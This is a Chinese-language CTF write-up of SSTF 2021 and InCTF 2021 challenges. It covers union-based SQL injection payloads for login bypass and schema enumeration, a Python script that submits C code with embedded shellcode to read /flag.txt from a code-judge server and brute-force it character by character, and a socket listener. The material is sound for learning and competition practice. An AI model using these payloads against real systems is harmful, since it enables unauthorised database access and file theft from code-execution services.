Some Latest Challenges Write Up

最近没什么时间摸鱼了两场比赛

Samsung Security Tech Forum 2021

sqli101

Mission: login as an admin using SQL Injection

Hint - SQL query

select id from users where id='{$_GET["id"]}' and pw='{$_GET["pw"]}'

要求和提示给的很明显，简单测试一下过滤了or

联合注入 payload：

?id=a&pw=a'/**/union/**/select/**/'admin

sqli102

一个根据关键词查询功能 ，给了hint

<?php
include "./config.php";
$succ = -1;
if($_GET['showsrc']) {
    show_source("step1.php");
    die;
}
if($_GET['searchkey']) {
    $succ = 0;
    $query = "select * from books where title like '%".$_GET['searchkey']."%'";
    $db = dbconnect("sqli102_step3");
    $result = mysqli_query($db,$query);
    mysqli_close($db);
    if($result) {
        $rows = mysqli_num_rows($result);
    }
}

?>

<!-- source: https://colorlib.com/wp/template/colorlib-search-23/ -->
<html>
    <head>
        <title>SQLi 102: Step 1</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="author" content="colorlib.com">
        <style id="" media="all">/* devanagari */
        @font-face {
          font-family: 'Poppins';
          font-style: normal;
          font-weight: 400;
          src: url(/fonts.gstatic.com/s/poppins/v15/pxiEyp8kv8JHgFVrJJbecmNE.woff2) format('woff2');
          unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB;
        }
        </style>
        <link href="style.css" rel="stylesheet" />
    </head>
    <body>
        <div class="s130">
            <form>
                <table border="0">
                    <tr>
                        <td style="font-size: 28px; text-align: left"><strong>A book search service</strong></td>
                        <td style="text-align: right; vertical-align: bottom"><a href="?showsrc=True">[HINT]</a></td>
                    </tr>
                </table>
                <div class="inner-form">
                    <div class="input-field first-wrap">
                        <div class="svg-wrapper">
                            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                                <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path>
                            </svg>
                        </div>
                        <input id="search" type="text" name="searchkey" placeholder="Enter keyword here" />
                    </div>
                    <div class="input-field second-wrap">
                        <button class="btn-search" type="submit">SEARCH</button>
                    </div>
                </div>

<?
    if ($rows > 0) {
?>
                <br>
                <h2>Search Result</h2>
                <table>
                    <thead>
                        <tr>
                            <th width="10%">#</th>
                            <th width="50%">Title</th>
                            <th width="30%">Author</th>
                            <th width="10%">Price</th>
                        </tr>
                    </thead>
                    <tbody>

<?
    for($idx = 1; $idx <= $rows; $idx++) {
        $row = mysqli_fetch_assoc($result);
        echo "<tr><th scope=\"row\">".$idx."</th>";
        echo "<td>".$row["title"]."</td>";
        echo "<td>".$row["author"]."</td>";
        echo "<td>".$row["price"]."</td></tr>";
    }
?>
                    </tbody>
                </table>
<?
    } else if ($succ === 0) {
?>
                <br>
                <h2>Sorry, no results for your request.</h2>
<?
    } else {
?>
                <br>
                <h2 style="padding-left:30px">Quiz#1: How many columns are in the `<strong>count_me</strong>` table?</h2>
<?
    }
?>

            </form>
        </div>
    </body>
</html>

主要看关键代码

    $query = "select * from books where title like '%".$_GET['searchkey']."%'";

sql的模糊匹配，先测试字段,为8时有回显

xxxxxxxxxxxxx%' union select * from books order by 8#

于是 联合注入，获取表名

xxxxxxxxxxxxx%' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8#

看到findme，获取列名,拿到flag

xxxxxxxxxxxxx%' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='findme'),3,4,5,6,7,8#

SW Expert Academy

Are you poor at algorithm coding? Here is amazing platform to enhance your coding skill!

题目要求

按要求搓了一个简陋的代码

#include<stdio.h>
int main(){
    int Gcd(int m,int n)
    {
        if(n==0)
        return m;
        return Gcd(n,m%n);
    }
    int a[6],b[6];
    int win=0,i=0,j=0;
    for(i=0;i<6;i++)
    {
        scanf("%d",&a[i]);
    }
    for(i=0;i<6;i++)
    {
        scanf("%d",&b[i]);
    }
    for(i=0,j=0;i<6;j++)
    {
        if(a[i]>b[j])
        {
            win++;
        }
        if(j==6)
        {
            i++;
            j=-1;
        }
    }
    printf("%d/%d",win/Gcd(win,36),36/Gcd(win,36));
    return 0;
}

然后通过了三个测试案例，就会返回了三个True，然后由前端弹窗提示通过了几个测试点。

发现通过也没用，然后再F12里看到

<!-- Flag is placed at /flag.txt in executor instance. -->

<input type="hidden" name="sample_answer_code" value="aW50IGFbMTJdO2ZvcihpbnQgaT0wO2k8MTI7aSsrKXNjYW5mKCIlZCIsYStpKTtpbnQgYW5zPTA7aW50IG1vZD0zNjtmb3IoaW50IGk9MDtpPDY7aSsrKWZvcihpbnQgaj02O2o8MTI7aisrKWlmKGFbaV0+YVtqXSlhbnMrKztmb3IoaW50IGk9MjtpPDM2O2krKyl3aGlsZShhbnM+PWkmJmFucyVpPT0wJiZtb2QlaT09MClhbnMvPWksbW9kLz1pO3ByaW50ZigiJWQvJWQiLGFucyxtb2QpOw==">

base64解密之后拿到代码

int a[12];for(int i=0;i<12;i++)scanf("%d",a+i);int ans=0;int mod=36;for(int i=0;i<6;i++)for(int j=6;j<12;j++)if(a[i]>a[j])ans++;for(int i=2;i<36;i++)while(ans>=i&&ans%i==0&&mod%i==0)ans/=i,mod/=i;printf("%d/%d",ans,mod);

？？？？？

知道了文件路径，尝试 fopen读文件 然后按位比较爆破，open被过滤了，利用system 反弹shell也被过滤了。但思路没问题了，读文件，比较，根据返回值判断。

我写了几行软弱无力的requests，然后Pandaos 大哥 写了shellcode来读取文件进行爆破。

import requests
import string
url='http://swexpertacademy.sstf.site/code'
def req(payload):
    while True:
        data = {'code': payload}
        res = requests.post(url, data=data)
        if res.text is None:
            continue
        return res.text


def test_one(pos, ch):
    code = """int myfunc();
    myfunc();
  return 0;
}
__attribute__((section(".text")))
const unsigned char code[] = {
    0x55,0x48,0x89,0xe5,0x48,0x83,0xec,0x50,0x6a,0x74,0x48,0xb8,0x2f,0x66,0x6c,0x61,0x67,0x2e,0x74,0x78,0x50,0x48,0x89,0x7c,0x24,0x20,0x48,0x89,0xe7,0x31,0xd2,0x31,0xf6,0x6a,0x2,0x58,0xf,0x5,0x48,0x89,0xc7,0x31,0xc0,0x6a,0x40,0x5a,0x48,0x8b,0x74,0x24,0x20,0xf,0x5,0x48,0x89,0xec,0x5d,0xc3
};

int myfunc() {
    char buffer[100];
    int pos = %d;
    (*(void(*)(char *)) code)(buffer);
    if(buffer[pos] == '%s') {
        int a[12];for(int i=0;i<12;i++)scanf("%%d",a+i);int ans=0;int mod=36;for(int i=0;i<6;i++)for(int j=6;j<12;j++)if(a[i]>a[j])ans++;for(int i=2;i<36;i++)while(ans>=i&&ans%%i==0&&mod%%i==0)ans/=i,mod/=i;printf("%%d/%%d",ans,mod);
    }
""" % (pos, ch)
    return req(code)

flag = ''
for i in range(60):
    for ch in string.printable:
        if 'true' in test_one(i, ch):
            flag += ch
            print(flag)
            break

本地挂代理都跑得慢，丢服务器上

Inctf 2021

Listen

一道network，给了一个ovpn文件，然后打开openvpn连接可以看到，连接到了 34.87.108.160 并且不断接收到数据

但是抓包一直没有抓到flag

解法是操作原生的 socket

由于菜，还没学socket，脚本是队友写的。自己添加了一些判断，然后顺便学习了一点点socket相关的知识，脚本如下

import socket
import re
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
start = 'inctf'
end = '}'
def listen():
    skt.bind(('172.30.0.14',31337))
    skt.listen(1)
    handle,addr=skt.accept()
    for i in range(4):
        text = handle.recv(2048).decode()
        flag = re.findall(start+"(.+)"+end,text)
        if flag:
            print(start+flag[0]+end)
    
listen()